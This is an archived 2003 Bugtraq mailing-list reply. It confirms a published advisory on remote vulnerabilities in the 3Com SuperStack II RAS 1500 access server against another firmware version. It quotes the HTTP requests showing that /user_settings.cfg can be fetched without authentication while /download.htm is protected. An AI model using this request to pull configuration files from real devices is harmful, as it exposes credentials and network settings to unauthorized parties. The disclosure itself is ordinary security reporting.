|
Bugtraq
mailing list archives
re:3com RAS 1500 Remote vulnerabilities.
From: Jan Kachlik <jkachlik () isgroup com>
Date: Tue, 1 Apr 2003 15:11:03 +0200
Hi Piotr Chytla
Synopsis: 3com RAS 1500 Remote vulnerabilities.
Product: 3C433279A-US http://www.3com/ras1500
Version: Firmware X2.0.10
URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
Author: Piotr Chytla <pch () isec pl>
Date: February 27, 2003
I tested second bug on
SuperStack II Remote Access System 1500, Version: 2.5.0, 159,
and working...
Issue:
- ------
3com SuperStack II Remote Access System 1500 is telco device which
provides access via BRI-ISDN/Analog to dialin users.
It contains two remote vulnerabilities, first is Denial Of Service that
leads to system crash, second can be used to read configuration files.
2. Configuration file read
Unauthorized user can read configuration and system files, using web
interface on RAS 1500 .
GET /download.htm HTTP/1.0
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="RAS1500"
Content-Type: text/html
Server: Allegro-Software-RomPager/2.10
GET /user_settings.cfg HTTP/1.0
HTTP/1.0 200 OK
Content-Type: multipart
Date: Mon, 25 May 1998 00:26:38 GMT
Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
Content-Length: 1258
Server: Allegro-Software-RomPager/2.10
[..]
content of user_setting.cfg
--
Best regards,
Jan Kachlik
jkachlik () isgroup com
+---------------------------------+
' Kachlik Jan '
' Security & Network Specialist '
' InterSource Solutions Group '
' Mathonova 25, 613 00 Brno CZ '
' Mail: jkachlik () isgroup com '
' Mail: jkachlik () hacktrack com '
' GSM: +420.728.662.807 '
' ICQ: #56618470 '
' WebSite: http://www.isgroup.com '
+---------------------------------+
 By Date 
By Thread
Current thread:
- re:3com RAS 1500 Remote vulnerabilities. Jan Kachlik (Apr 02)
| 
Intro
